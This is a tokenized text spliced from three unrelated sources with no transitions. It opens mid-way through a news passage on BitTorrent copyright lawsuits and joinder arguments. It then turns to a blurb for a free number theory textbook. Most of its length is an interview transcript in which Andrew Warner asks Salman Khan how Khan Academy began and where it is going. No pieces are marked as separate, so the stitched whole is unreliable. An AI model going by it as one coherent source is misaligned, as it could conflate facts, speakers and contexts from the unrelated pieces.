" Once the sharing of that file was over , so presumably was the relationship between the infringers . "
But the lawyers argue that BitTorrent swarms create ongoing , complex network relationships , and that anyone who ever participated in a swarm for a particular file can be joined with anyone else .
Much of this material comes nearly verbatim from the attached sworn declaration of Patrick Achache , the director of Data Services for Guardaley .
Guardaley is a UK company that operates out of an office park in Berkshire , and they handle all the IP address harvesting for the US Copyright Group .
Using hashes , mathematical calculations that can show if files are identical , and file name and file size numbers , Guardaley claims that most movies it investigates have relatively few seeds ; these few initial copies end up shared widely .
( His example file was the 701.4MB " Far Cry 2008 DvdRip ExtraScene RG.avi . "
Numerous defendants have already claimed to Ars that they had never heard of this film before being targeted . )
Many downloads of the films in question must therefore involve a single file .
If a set of IP addresses are seen to share this file — and not just any copy of a particular movie — they can reasonably be said to participate in the same transaction .
The EFF and ACLU will no doubt object to this characterization of BitTorrent ; indeed , in their amicus brief , they claim that the court 's analysis should n't change just because the protocol differs from earlier P2P lawsuits .
" Nor does the analysis change because the BitTorrent protocol works by taking small fragments of a work from multiple people in order to assemble a copy , " they wrote earlier this month .
" The individual Defendants still have no knowledge of each other , nor do they control how the protocol works , and Plaintiff has made no allegation that any copy of the movie they downloaded came jointly from any of the Doe defendants .
" Joining thousands of unrelated defendants in one lawsuit may make litigation less expensive for Plaintiff by enabling it to avoid the separate filing fees required for individual cases and by enabling its counsel to avoid travel , but that does not mean these well - established joinder principles need not be followed here . "
EFF lawyer Corynne McSherry , who signed the brief on behalf of all parties , was yesterday admitted to appear in the case ( as an out of state lawyer , she needs the judge 's permission to appear ) .
The judge today ordered a June 30 hearing , apparently to discuss the issue of joinder .
This is a textbook about classical elementary number theory and elliptic curves .
The first part discusses elementary topics such as primes , factorization , continued fractions , and quadratic forms , in the context of cryptography , computation , and deep open research problems .
The second part is about elliptic curves , their applications to algorithmic problems , and their connections with problems in number theory such as Fermats Last Theorem , the Congruent Number Problem , and the Conjecture of Birch and Swinnerton - Dyer .
The intended audience of this book is an undergraduate with some familiarity with basic abstract algebra , e.g. rings , fields , and finite abelian groups .
On November 2008 , this book was published by Springer - Verlag and can be purchased from Amazon.com .
Springer - Verlag has also very generously agreed to let me make this book completely free online .
So please feel free to download it :
Free Legal PDF of this book
In 2017 , Pyung - Lyun Kang translated the complete book to Korean :
Free Legal Korean Version
Also , see github for the book 's LaTeX source code and newer versions .
Of course , I would greatly appreciate it if you support the book by buying it .
This book is based upon work supported by the National Science Foundation under Grant No. 0653968 .
Any opinions , findings , and conclusions or recommendations expressed in this material are those of the author(s ) and do not necessarily reflect the views of the National Science Foundation .
Andrew : Before we get started , I ’ve got to tell you about three great companies .
PicClick is the first .
It ’s a one person start - up from my friend , Ryan , in San Diego .
PicClick gives you a visual way to search eBay , Etsy and other sites .
Ryan is already doing one million product sales per month on picclick.com , not hits but sales .
Go to p - i - c - c - l - i - c - k.com to see how he ’s doing it .
99 Designs is the largest crowd source marketplace for graphic design .
When I used them , I wrote a description of the design I needed and how much I wanted to pay .
I got a bunch of designs back .
I gave each designer feedback and picked the one I liked best .
And that ’s the only one that I paid for .
Try them for logo design .
If you need a blog design , use them .
If you need app icons , use them .
There ’s so many different reasons why you might want to use them .
Check out 99 Designs and you ’ll see why so many past Mixergy guests have used 99designs.com .
And Grasshopper , I ’ve had them now as my longest sponsor for a reason .
Not only does my audience love them , but you might have heard several guests here on Mixergy say that they used grasshopper.com as a result of these messages , and they love it .
It ’s the virtual phone system that entrepreneurs like me love because it offers us multiple extensions , music on hold , call forwarding .
It gives an impression of having a big professional organization but also caters to your need to travel and be flexible .
Check out grasshopper.com .
Here ’s the program .
Hey everyone , it ’s Andrew Warner , founder of mixergy.com , home of the ambitious upstart .
I ’ve got with me today Salman Khan .
He is the founder of an online school that ’s launched and run largely through YouTube .
Do I have that right ?
Interviewee : Yeah .
Well , it ’s known mainly for the video library on YouTube right now .
There ’s 1500 videos .
It ’s had over 16 million views , 200,000 unique users a month .
It is definitely the most used education platform on YouTube , and as far as I can tell , looking at the other open course initiatives , the most used library on the web right now .
Andrew : I went to the courses in preparation for this interview , and I saw that you teach math , basic math .
You say that you started out teaching 1 + 1 = 2 . I got so into a history course that I almost stopped working .
I said , “ Andrew , you ca n’t do this . ”
So , you know what I did ?
I used this program called Zamzar that ’s going to rip your course .
It ’s going to put it on my iPhone .
I ’m going over to Estancia here this weekend .
On the ride over I ’m going to be watching you teach me history .
It was that freaking fascinating .
Interviewee : Oh , cool .
I ’m glad .
That ’s actually really good feedback because there ’s a lot of interesting discussion about how credentialed someone should be to teach a certain subject .
And most of my credentials are computer science and in finance and math .
I did the history .
I love history , but I did that : one , to kind of push the boundaries , to show that you do n’t have to necessarily have a PhD .
You just have to have a passion for the subject .
So , I ’m glad to hear that .
And we hope you wo n’t have to rip it soon .
It ’ll be on iTunes by the end of the summer .
It ’ll be on iTunes the entire Khan Academy library .
Andrew : I ’m going to come back to that point that you said you do n’t have to have a PhD .
I want to ask you about what qualifies you to teach all of these subjects because you ’re teaching more and more of them .
You ’ve got a course on how IPOs work , on how to raise money for a startup , all that .
Let me start off by asking you a question that I ask a lot of my other guests here .
How much money does the Khan Academy make ?
Interviewee : Well , that can be answered on a bunch of different levels .
It is a not - for - profit .
That ’s a decision we can talk about because there was a kind of thought process .
I was being approached by some people in the venture capital and the entrepreneurial world about starting as either a social for - profit venture or a pure for - profit venture or a little bit of both .
But , it is a pure not - for - profit , and there ’s a little bit of advertising that comes in .
It goes to the not - for - profit , and we ’re being very delicate about the advertising .
We ’re not too aggressive there .
And when I quit my job as a hedge fund analyst in September , I was making nothing .
So , it was essentially living off of savings .
Andrew : I ’m sorry .
Our video cut out right after you explained that you quit your job as a hedge fund analyst , and then can you pick it up from there ?
Interviewee : Oh , yeah .
So , after I quit , I was living off of savings until about , I would say , a month ago where we ’ve gotten some fairly significant donations .
So , now , I can , at least , take a salary to do this , you know , not a hedge fund salary but a salary .
Andrew :
And the donations are coming from people who are hitting that donate button on top of your website ?
Interviewee :
There ’s a ton of people who are hitting that little PayPal donation , you know , and that ’s anywhere from – I ’ve gotten donations as little as 50 cents all the way – but there ’s a lot of people who just donate unsolicited 100 , 200 , 300 , 500 .
I ’ve even gotten a couple that were 2-3,000 just from that PayPal donation button .
But , more recently , we ’ve gotten some pretty significant checks from people out here in the valley that get us to the point that I ’ve ready to have a salary for , at least , several years .
And , obviously , there will be other opportunities to go from there .
Andrew :
What kind of people ?
Interviewee : A couple of them are venture capitalists in this area .
The one gentleman , he ’s actually not in the valley , he ’s in Europe .
He ’s a pretty prominent businessman in Europe .
There ’s another .
A lot of the people are people that are in the tech space .
They ’re not doing it as an investment , obviously .
It ’s a not - for - profit , but I think they ’re excited about the potential here , the potential for kind of disrupting and …
The feedback that I get from a lot of them is : look , a lot of people have talked about doing this type of thing .
It ’s kind of an obvious idea , taking videos from good instructors and put them on the web , and eventually do some analytics around it , do some self - based learning and everything ’s going to be great .
But , no one ’s really done it .
The best to date outside of Khan Academy is the open course ware efforts at MIT and Stanford and all of that .
That ’s essentially just been videos in classrooms and …
Andrew : Boring .
Can I say that ?
Interviewee :
You can say it , and I feel the same .
I ’m a huge consumer of their open course ware , but you have to be really motivated and sit through a lot of things that you do n’t necessarily want to pay attention to , to get to what you want .
Sometimes , it ’s delivered well .
Sometimes , it ’s not .
It ’s kind of inconsistent quality .
There ’s all sorts of other things that occur when you have the video camera in the classroom that make it a little bit weird .
I think they appreciate the fact that Khan Academy is 99 percent execution and 1 percent talk .
Andrew :
Let me ask you this , then .
I ’ve got your resume here .
I actually went to the way back machine to see what you were up to before you did this , to see who you were .
And you had your resume up and I looked at it and it ’s pretty freaking impressive .
In addition to three degrees from MIT which a lot of us have seen in news stories about you and the one from Harvard , you worked at Oracle .
You worked at a venture capital firm .
You were on a path to be one of these rich people of Silicon Valley .
You ’re not going to be that now , right ?
Not with this .
Interviewee : Unless they make a movie about the Khan Academy .
Yeah , you know , it ’s funny .
When I was working at a hedge fund , the six years after business school , I was the senior analyst at a hedge fund , and it was doing well .
And then , my manager retired .
He encouraged me to start my own fund .
So , I was on that track to kind of be a hedge fund manager and all of that .
But , the whole time I kind of rationalized that the only reason that I ’m doing this is because I want to , one day , start a school .
In my mind , I did n’t want to start a school , write grants and go to the Department of Education and get a charter and all of that .
I felt the constraints .
I just want to become really rich and just do it on my own terms .
So , that was my rationalization for just trying to generate alpha day and night .
As the Khan Academy story goes , I kind of got an outlet for some of my ideas with my cousins , tutoring them virtually .
And then , the YouTube thing took off , viral software app .
A lot of people are using that , and a lot of the vision started to become concrete a lot sooner than I had expected it to .
Then , it was just kind of a little bit of introspection , realizing that I got a lot more satisfaction out of it .
The hedge fund job , it is a great job even irrespective of how much they may or may not compensate you , but this was just ten times more fun , just the impact .
Almost everything I did on a daily basis , it kind of added to this library that could be around forever .
My son , who ’s 15 months old right now , could use it when he ’s 18 or 30 or whatever .
So , that idea got really exciting , and just when you think about it , and you see people in the valley like this .
I think Silicon Valley is an interesting place because you do see this .
It really is n’t about money .
I think so many people , they view the money as kind of , “ How important was my contribution to the world ? ”
I think with Khan Academy I get to do that without having to play the whole venture backed startup game , and what ’s interesting about Khan Academy is even though it ’s not going to make me any money and I ’m not going to be able to buy a nice house in Atherton and all that type of thing .
In terms of just impact , it is already kind of getting more notoriety than many already fairly successful startups .
If I had a startup role and I had an exit for 10 or 20 million dollars , that ’s a huge win .
Those types of things are a dime a dozen out in the valley .
But , the Khan Academy I already feel has more impact than a lot of these .
So , from that point of view , it was just way more impact , way more fun .
Every day the things that I was contributing , I felt is contributing to a lasting legacy and it ’s just the letters you get from people .
I mean , this was also another realization .
When you work at a firm , kind of the best thing that can happen to you is a pat on the back from the boss or a nice bonus .
But in this , I ’m getting letters , like 20 or 30 a day , and these letters – some of them are just thank you , but some of them are like , “ I was going to fail algebra until I started using these videos ” or “ Now , I want to be an engineer , and I thought I was bad at math my whole life . ”
So , when you get stuff like that , it really makes you say , “ Hey , this is what I want to do . ”
Andrew : How about this ?
I saw one letter on your website .
Someone said – I do n’t know where she was or where he was , but the letter went , “ Where I live , black kids do n’t really have access to schools , and my mother moved me so I ’d have more opportunities , and my teachers were n’t doing it for me .
And then , I discovered your videos .
Essentially , that was the story and things changed . ”
Interviewee : Yeah , that letter I actually put on my website , I view that as the letter that as someone that really convinced me to quit my job .
I mean , there are multiple other moments over the last , I would say , over the last three years where Khan Academy got a letter or something like that .
And I ’d say , “ Maybe , I ’ll do this full - time or take time off from the hedge fund world . ”
And then , I ’d look at my finances and say , “ No , no .
Maybe , I ’ll do the hedge fund world for a little longer . ”
I got that letter in August , late August of ’09 .
I got that letter in the same week that the Khan Academy got some notoriety from the Tech Museum , from the Microsoft Tech Award .
It was getting a little press , and I just kind of viewed it as a confluence of events that were telling me that I should be doing this .
That letter , especially , I still think to date that ’s definitely one of the top five letters that I ’ve gotten .
I mean , without me doing anything incremental for that person , they just consumed these videos over summer and they really changed their life .
Andrew : People in the chat room are just so inspired .
I see Dan Blaine saying , “ This guy is really inspiring . ”
We ’re only ten minutes into the interview , and he ’s already inspired , he says .
So , it ’s drawing integrity from Joseph Jacks , everybody here .
They ’re just loving it .
“ Holy crap ” from Joseph Jacks , about your three MIT degrees .
So , you ’re blowing us away .
Let ’s do this .
Interviewee : Well , I ’ll add this as another kind of thing about making it non-profit here is that the good will that comes out from this is just orders of magnitude greater than anything .
I ’m convinced if I did it as a for - profit , it would n’t have had the same level of good will .
We could talk more about that in general , but I think people respond well to it .
So , people are coming out of the woodwork to really help as well .
Andrew : See , here ’s what I ’d like to do .
I ’d like to ask you about your vision long - term so I could continue to be inspired and inspire my audience .
I want to find out how you got here , and then I want to ask you how’d you do it so well because you ’re able to take subjects that you did n’t spend your whole life learning , but somehow you make it seem like they ’re part of who you are .
And then , you explain them in an easy to understand way .
I want to learn how you do that .
So , let ’s start off with the big vision so we know where you ’re going with this .
What do you envision in the future coming out of this ?
Interviewee : Well , people know about the videos .
I ’m going to keep making videos .
They ’re probably the highest return on my time .
I was talking to a foundation yesterday , and they were like , “ What do you envision yourself in five years ? ” I spend , at least , 60 percent of my time .
I ’m still going to make videos and an infinite amount of knowledge , as you know .
I teach things that are not necessarily in my core expertise , but I make them part of my core expertise so I can teach them .
Beyond just the video library , I see it becoming a free virtual school , and what I think that entails is you have a video library .
You have self - paced adaptive exercise .
You do n’t need call them adaptive , if you like .
I actually started building that before I starting working on the videos .
The videos are actually a complement to the software piece .
People can log in at khanexercises.appspot..com .
It ’s all free .
You can see the Google account .
It ’s on App Engine , and people started coming out of the woodwork .
They started working on that .
It ’s an open source project on top of that .
Not only will Khan Academy be a virtual school , but that code can then be used for anyone else if they want to make their own island of education , if they want .
But the idea is you have the videos .
You have exercises that start 1 + 1 = 2 . I ’ll work you all the way up , and they ’re dynamically generated .
We take you all the way up .
Right now , they go all the way through algebra , but we just go well beyond that .
With the exercise , I want them to go through calculus , chemistry and those keep building out .
We collect data on everything .
We know what videos you watch , when you watch the videos , what exercises you ’ve watched .
We ’ll do histories on when you ’re stuck , and then what I think would complete the picture in the virtual school is leverage the community .
Do actual peer - to - peer instruction .
So , if I know that Andrew is having trouble with negative exponents and Sal who lives in Mountain View knows negative exponents and I know both of your schedules , I ’ll set up a peer - to - peer interaction .
And then , you and I will have a session , not too different than I was having with my cousins four years ago .
And then , we ’ll also report it .
It also becomes part of this library .
Then , we can collect all of this data around .
Was that a good interaction ?
I ’ll rate you .
You ’ll rate me .
And then , we can also see what the rest of the statistically significant outcomes on your performance .
I think there ’s a lot to be said .
In the for - profit world , there ’s a lot of people doing video libraries .
And they ’re doing different ways to collect data and have the best videos .
Then , there are other people doing exercises , and then , there are other people who are starting to explore the peer - to - peer learning .
But , I ’m pretty convinced in order to do it properly , you want to have all of them together in the same place .
Andrew : OK .
So , we got the videos today .
You talked about what you have up on App Engine .
I played with that game for a little bit .
It ’s interesting .
You get to learn , and then you go into a place where you take quizzes , based on what you ’ve learned .
So , to use the example that I played with , it was , “ What ’s 9 + 5 ? ”
And if I did n’t know the answer , I could press the button to see a hint , and the hint showed me balls underneath 9 .
And if I still did n’t know the answer , I would hit the hint again , and I ’d see 5 balls under 5 and then I could answer it and you keep track of it .
So , you ’ve got that today , and in the future you ’re going to add peer - to - peer .
You mentioned that there are people who are already doing this .
What about people like Cramster who ’s doing this already or who else ?
Who did I interview here ?
I interviewed the founder of University of the People Shai .
He wants to create an online university .
How does this fit in with what ’s already out there ?
Interviewee :
You know , I think a lot of the focus so far has been on platform , but I ’m not 100 percent .
I ’m somewhat familiar with both of those two efforts that you ’ve had , and I think in order to make these work , platform matters .
But the platform really has to have a core of really good content .
That ’s what ’s going to make people use the platform , and I think right now the value proposition and I think that ’s the reason why Khan Academy has a lot of attraction is because it has …
When people say , “ What is Khan Academy ? ”
It ’s 95 percent content and 5 percent platform .
But I think that ’s what gives us the ability to eventually turn it into 95 percent platform , maybe , 50 - 50 , 50 percent platform .
So , I do n’t know what these other efforts are , but I ’ve even advised a few startups in the valley about education and that .
Without trying to be too blunt about it , I think a lot of their problem is that they ’re a couple of MBAs .
They have this big picture idea which is not an incorrect idea , but I think they downplay the value of good instruction , or they downplay the value of really good content which I think is super important in education .
Andrew :
All right .
Let ’s go back to how you started this .
I feel like everyone probably knows it already , but they ca n’t possibly .
Can you tell people ?
The reason I feel that is because lately in our space , in the entrepreneurial space people keep talking about you .
I saw you on Hacker News .
I saw your story on Jason Freed ’s site .
Of course , a lot of us are NPR nerds .
We heard your story there .
For anyone who did n’t hear how it started , can you tell them ?
Interviewee : Yeah .
Well , it depends how early you want to go .
If you go back to college , I always did have this vision of kind of creating a Holy Grail .
At the time , I thought it would be a software - based education platform .
but , obviously , my career got derailed in a hedge fund .
We ’re in 2004 now .
My cousin and uncle and aunt were visiting me from New Orleans .
My cousin , Nadia , was having trouble –
It came up in conversation that she was not placed into pre-algebra for seventh grade .
And then , I said , “ Hey , that ’s a big deal .
You do n’t realize it .
It seems like a harmless thing in middle school .
But then , she ’s not going to take algebra in eighth grade .
She ’s not going to take calculus when she ’s a senior , and that ’s when it ’ll really limit her career opportunities , all these other byproducts and even her own self - confidence . ”
And she is a really bright girl .
She was a really bright girl then .
It was pretty obvious .
So , I made a deal with her .
I was like , “ Hey , if you are willing to work with me half an hour a day after your school and my work , I ’ll tutor you mobily .
I ’ll be in Boston .
You ’ll be in New Orleans . ”
And she agreed , and we started doing it .
We just used Yahoo Doodle and a conference call , and it ended up working out really well .
Even within a couple of months , she had not only done pre-algebra , she was working on algebra stuff .
And then , I started working with her brothers and then other family members and family friends .
A couple of things popped in my mind .
One - on - one teaching can really work , even if it ’s virtual .
It might be kind of obvious , but I wish there ’s a way I could make this scale a little bit or at minimum make it a little easier for me to logistically handle everything that I ’m doing .
And so , I did two things .
I started working on the software .
I started doing that before the videos .
When I started tutoring even Nadia , I would point her to random websites and I would say , “ Hey , there ’s some exercises there .
Why do n’t you play around with them ? ”
And I did n’t know what she did , when she did the exercise .
I said , “ Well , I ’m going to have to take her word for it ” and how she felt about it .
So , I kept pointing her to different things , I said , “ Why do n’t you try my own little Java Script of scripts to generate problems ? ”
And then , I put a little database behind it so I could track when she ’s doing it , how long it ’s taking her and all of that type of thing .
And then , a buddy literally said , “ Hey , why do n’t you add some videos there ? ” because I was telling him about these kids .
I keep having to do the same lecture over again , and it ’s getting hard to schedule .
I have five or ten kids that I ’m working with , and I have a day job .
He said , “ Why do n’t you make YouTube videos ?
It might be useful for them . ”
So , I tried it out , and the initial feedback I got from my cousins was that they liked me better on YouTube than in person or virtually or live .
I think the takeaway was that there was less stress .
They could pause and repeat .
They could do it on their own time .
There ’s none of this scheduling situations .
So , I got that feedback from them .
Other people started watching the videos , and other people started sending these notes , like “ Hey , I got an A on my algebra exam because of this . ”
At first , it was only one note a week or one a month , but it got me pretty excited , and the idea started to crystallize .
Gee , if I make this library , even if it ’s just useful to my family , like my cousins who are using it now and I did n’t have a son at the time , but my future kids and anyone else .
That ’s like a huge gift to our family , and if other people end up using it , that ’s even more neat .
So , it kind of became a fun outlet for me .
We had moved out to Palo Alto a year after that .
So , I was working East Coast hours .
So , I was done with work by about 2 p.m .
My wife was in medical residency , so I had a lot of time .
This was a fun use of my time , and it was an outlet for me to get these educational ideas off my plate , and I loved mathematics .
It was also a way to engage parts of my brain that I had n’t engaged in a while .
So , it was just a lot of fun , and it was actually having an impact .
And then , fast forward four years , September 2009 , and take it from there .
Now we have , whatever , 16 - 17 million views , and it ’s the most used open course library .
Andrew : September , 2009 , being the date you quit your work so that you could do this full - time .
Interviewee : Right .
Andrew :
You know , what I ’m wondering as you ’re saying this , if I had a relative that wanted to learn math or wanted to learn anything , I might help them once .
And then , after that I might refer them to a website where they can go and learn after that .
Why would you spend so much time ?
You ’ve got a job .
You ’ve got other things going on .
Interviewee : Well , it was fun .
Well , look .
If you work at a hedge fund , it was a great job .
And I have to say , the hedge funds I worked for and I worked for one hedge fund in particular for six years .
It was n’t the typical , like , really high powered , Type A type place .
It was a really intellectual , thoughtful type of firm .
My boss was a really great guy , really focused on work - life type balance .
But , at the same time it was a really good job .
But , there was n’t a lot that you could say what have I contributed to the world today and even the nature of the hedge fund job itself .
You could do really good analysis and the investment goes nowhere and you could get lucky .
So , there ’s a lot of that .
You almost crave for something that you do every day where you feel like I did this for x hours and that x hours was a positive contribution to something .
It made the pie a little bit bigger .
It gave me a little purpose , and it gave me an outlet , and it made me feel like I was n’t …
I talked to a lot of my friends who are roughly at my stage in my career , and I was like , it kind of dawned on me that , “ Look , your life is pretty valuable . ”
And what I was doing at the hedge fund , I do n’t want to demean it .
I think it ’s a great job , but I spent six years of my life .
But really what I had to show for it was I had experience .
I learned to analyze securities better , and I saw a lot about how businesses work and all that .
But , what I really had to show for it was just some numbers in a bank account some place .
Like , I really had no actual , tangible contribution to show for it , and this gave me that outlet where I felt like these years were n’t wasted .
And I feel that more and more .
Every day I almost feel like my day is wasted if I do n’t make a few videos or I do n’t write a little bit of software .
If I just sit the whole day in meetings or if I ’m trying to fund raise or whatever else , I feel like I ’m not doing what the Khan Academy is supposed to be doing .
Andrew :
Did you think at the time that this might help you prepare for the school you ’ll launch some day , or did you think that , maybe , this would lead to a school or software that I can create and sell ?
What did you think it was going to lead to ?
Interviewee : Once the Java Script modules , once I had about , I would say , 20 of them and I was using it with my cousins and family friends and they were using it , it really was teaching them and you combine that with the videos .
So , the video library got to about 100 .
The combination of it really was pretty good at teaching people pre-algebra through algebra .
I started thinking very seriously .
You know what ?
The school of the future needs to have something like this as its operating system .
It needs to have something like this as DNA .
So , I did and actually I do view this virtual school that we talked about earlier .
It is a virtual school .
It can stand on itself .
People can go to that virtual school and use it to learn things independent of anything else , but it can also be used as the operating system or the DNA for a physical school where you have a one room school house , kids of all ages .
It ’s actually a very bizarre way that people can age with different concepts .
So , you have students of all ages in a room together .
They ’re working on , for part of their day , not their full day ; for part of their day , they ’re using technology to kind of get their core skills going .
If they do n’t understand something , there are other people in the room that are going to help them .
So , you have a lot of peer - to - peer occurring in the room .
It can occur cross site .
And then , the rest of the day is spent doing real project - based learning .
There ’s a lot of talk about project - based learning , but not much of it is substantive .
I mean , real project - based learning , kids are actually learning to program , like they ’re really working , building things .
They ’re actually writing things that are being published .
They ’re actually composing music , instead of just learning to play music .
So , that ’s the whole aspect .
I definitely wanted this to become eventually and it does seem like it is becoming the DNA of a possible framework in school .
I know I did a couple of summer camps , and the teachers wanted reports ; can I see where all the students are .
And we pretty quickly settled on a kind of paradigm where the teacher would walk into the room .
All the kids were working at their own pace , and the teacher just gets a spreadsheet that says everyone is fine , but those two kids are having trouble with adding and subtracting negative numbers .
And so , instead of the teacher giving a lecture and all of that type of stuff , the teacher takes those two kids aside , does a very intimate session with them and let everyone else work at their own pace .
Then , who are the next two people that need help ?
Then , even before the teacher gets involved , you can have peer - to - peer help and all that type of thing .
So , as you get more and more technology , you get more and more data on it .
It can make everyone ’s life a lot more streamlined and be able to do much more intelligent things on where you point people ’s energies .
Andrew : I can so see the passion as you talk about this .
I ca n’t imagine you were this passionate about hedge funds or venture capital or any of the previous work .
Interviewee : Yeah .
No , I was .
Andrew :
You were ?
Interviewee : Now that I ’m not working in those industries , I can say it .
[ laughs ]
I think outside of the Khan Academy my job in the hedge fund was probably the best possible job .
What was fun about it , as you mentioned earlier , I teach out of my core competency , so a lot of what I do is I really learn new things , and I try to learn it at a really deep level .
And that ’s really what I had to do at my hedge fund job where every day we talked to an oil company .
Then , the next day we talked to an Internet marketing company .
Then , the next day we talked to a chicken egg company .
So , it was this kind of process where you ’re always learning new things , and you have to become a quick expert .
Andrew : I see .
All right .
So , you get these videos online .
I understand how today when you have – how many videos do you have ?
Interviewee : A little over 1500 .
Andrew : A little over 1500 .
I understand when you get to even 500 to 1000 videos , it starts to feel like something .
When NPR comes and interviews you , when the BBC has you on , it starts to feel like something .
What about when it was just 100 or 200 ?
Did you ever feel at those moments , “ I ’m just a YouTube producer , me and the guy who ’s creating the cat videos ” and he ’s got more viewers than I do .
Interviewee : Oh , yeah .
Absolutely .
I mean , I think in the past year a lot of friends and family are saying , “ Yeah , what Sal ’s doing is great . ”
You can go back three or four years ago , and I was kind of just going into sometimes the guest room and then eventually a converted closet and making these YouTube videos .
“ What ’s Sal doing ?
Why ’s he spending all his time doing this ? ”
I had a lot of friends who thought it was kind of weird .
Andrew :
Tell me how that felt .
It ’s easy to look back and say , “ You know , that ’s what happened and we got through it . ”
Tell me about how that felt so that when I have that situation in my life or one of our listeners has it in their lives where they ’re just like 100 videos into a million video project , the way you were back then and no one believes in them .
And they doubt themselves , and they can identify with you .
So , what was it like for you ?
Interviewee : I think what allowed me to kind of keep up the high level of energy and stay motivated and want to do it is that I did n’t care if it ever got to where it did get .
I was pretty happy with the , I guess you would call them , small successes .
I was excited that 20 people a day were watching , 20 people who I did n’t know were learning math from me .
And the idea that , even if I were to get hit by a bus , 20 people a day even if it did n’t grow at all , would still learn math from me .
That , to me , was a pretty profound concept .
And so , for me just a couple of notes a day and that idea were enough for me to say , “ Hey , this is a project worth my time . ”
At minimum , knowing no non-relatives watched it , but if my son when he ’s 18 years old is able to learn a little bit of algebra or calculus from me , that by itself makes it worth it .
That by itself makes it a neat project .
And so , I think in those early days I was just excited by that small impact .
That was enough .
Now , in the back of my mind it was growing .
I said , “ Well , if it keeps growing at this rate – Right now , there ’s 20 .
Next month there might be 30 , and boy , in a year , we ’d have a couple thousand .
In two years , you know , exponential growth .
It happens pretty fast .
So , that would just be gravy on top of everything else that happened . ”
Andrew : Did you have a moment where you doubted it , where you were down on it , where you said , “ What am I doing here in the closet or on my computer , wherever it was ? ”
Interviewee :
You know , I never did .
I never doubted it .
I ’ll tell you one thing .
I ’m a bit of a stubborn character , and I did early on have people say , “ Who do you think you are ? ”
Like , I have friends who are school teachers , who are academics – not all of them .
Some of them were very supportive .
They thought it was cool .
In general , I got kind of a negative pushback from people who had never experienced the videos .
I think there ’s two camps , people who actually experienced the videos and said , “ Wow , this is kind of a cool way to learn .
And it was strangely engaging and strangely addictive , and it kind of got me excited about things .
And it was kind of entertaining . ”
And those people were almost universally supportive .
But , a very small subset of my people who are close to me actually did that .
They actually took the time to experience them .
A lot more people I know were like , “ You know , there ’s billions of dollars being spent on education .
There ’s thousands of people with PhDs , spending their whole life on fixing the education system .
Is n’t it arrogant of you to think that you and your YouTube videos are going to have any type of impact ? ”
That ’s essentially the summary of what a lot of people would tell me .
I would defend it a little bit at first .
Well in the back of my mind , I would say , “ Well , a lot of those efforts , they ’re just spent on bureaucracies and people talking about things ” , but I would n’t say that .
My response all along was , “ You ’re right .
I just want to do my own little small thing .
And if it has any effect , it has any effect . ”
But , in the back of my mind , it made me really angry .
It motivated me even more to make more and better videos .
To some degree , that ’s what – like the history of videos you ’re talking about .
I mean , every time I make a small set of videos which are algebra and pre-algebra .
It always gets , “ Oh yeah , that ’s nice and cute what you have there , but this wo n’t work for calculus or this wo n’t work for differential equations or physics . ”
You may be right .
But then , I ’m going to go home and show that person .
I ’m going to make something of calculus , and then immediately you get the pushback .
This might work for that , but it wo n’t work for humanities .
You wo n’t be able to do that .
You ’re going to have to get other people .
It ’s amazing how many people still tell me , “ So , you ’re going to have to get more people . ”
I mean , I ’m open to it .
I ’m not like a guest .
In fact , when I started I thought that ’s how this would happen , that there would be 20 of us doing it .
It was actually hard to get – a lot of people would say , “ Yeah .
That ’s awesome ” , like at parties .
People were like , “ I want to make videos , and that would be so cool . ”
But , actually when it comes to sitting down with a tablet and recording YouTube videos , no one really did it .
And so , even now there ’s a lot of assumption of like , “ Oh well , you ’re not going to be able to do all of K through 12 . ”
Part time for four years , I was working at the hedge fund for most of the time .
It ’s pretty much 90 percent of K through 12 math has been done , and you can extrapolate that whole time .
It ’s not going to take long to do it .
I ’m not going to say that I ’m the only person .
I actually want other people to do this , but they ’re not doing it .
So , if they ’re not doing it , and I want to do it anyway , so I ’m going to do it .
It is a bit of a motivating force when people kind of question your validity or your ability to execute on something .
I think it ignites a fire in your belly a little bit .
Andrew : Yeah , I ’ve seen that .
I felt that in myself , too .
How do you do it ?
How do you do it so well ?
Actually , why do n’t you start out by describing it ?
Maybe , I should have done that earlier in the interview .
Why do n’t we start out by you describing it first ?
Interviewee :
The videos , you do n’t see me .
They ’re a black background , almost universally .
Some of them do n’t have black backgrounds , but they have black backgrounds and I ’m just writing in colors that I think look nice while I talk , while I marry the video .
The forum factor , there ’s two things .
This is essentially a non-experience even when I was doing it , it was an initial line of virtual obsessions with her .
She did n’t see me .
We just had a conference call going , and she saw what I was writing , and so it worked with her .
I sensed that that will probably work .
I did n’t have good recording equipment .
I did n’t have a video camera .
And even if I did or even thought at one point about buying one , it ’s really difficult .
Even if you get a nice video camera , you have to get your lighting right .
Then , you have to get your own microphone .
There ’s all sorts of crazy things you have to do to make it look professional , but if you just do screen capture with a USB headset and I started with Microsoft Paint .
And now , I ’m using a little fancier stuff .
I ’m still using Smooth Draw 3 .
It ’s a piece of freeware .
It comes off a lot better .
And the feedback I get from people , it ’s kind of obvious .
Now in hindsight , it ’s actually a much more intimate forum factor .
It does n’t feel like I ’m on the other side of a room , lecturing to you .
It only feels like we ’re either beside each other and we ’re looking at the same blackboard and the same piece of paper , or it even feels like what my narration is your thoughts on some level .
So , the forum factor both is compelling to a lot of students , and it ’s real easy for me .
I really just have to press record , start the screen capture going .
I do n’t have to comb my hair .
I do n’t have to shave .
I do n’t have to do anything , and I just start talking and start teaching .
And , you know , the question of how I do it – things like , a lot of the algebra content .
I do a lot of that real time , very conversational .
A lot of the example problems I do .
In the early videos I actually made them up on the fly which I realize that kind of wastes a little bit of time .
But I always do them on the fly , and I think that gives students a lens into concepts that they do n’t normally see .
In the textbook or the traditional lecture , you always have a finished product .
The teacher has seen the example .
They ’ve done the example .
Maybe , they ’ve done it six times that day for the last 20 years , and you never see the art of the problem .
You never see it solved in real time , and I get a lot of feedback .
Students like to see me go down a little path and say , “ Oh , wait .
That ’s not right .
I did it because it looked like that .
Let me back up and go down this other path . ”
So , they really appreciate that informal , conversational kind of thinking out loud style .
For the more kind of preparation intensive topics , I did cellular respiration or the French Revolution .
These are n’t things – I was exposed to them in my education , but they were n’t something that I would like , if you bumped into me two years ago and said , “ Sal , tell me everything , tell me how many APTs are generated by the stage of cellular respiration . ”
I would have been like , “ Well , it was a long time ago . ”
So , those type of things I do spend a lot of time immersing myself in the subject matter .
Andrew :
Tell me about that .
Tell me about the process .
How do you absorb that knowledge , and then we ’ll get into how do you share a tough topic with someone else .
How do you teach it ?
How do you get the knowledge in your head so quickly ?
Interviewee : Well , I just try to read as many things as I can .
To some degree , I do n’t know .
Obviously , Khan Academy is dependent on the web .
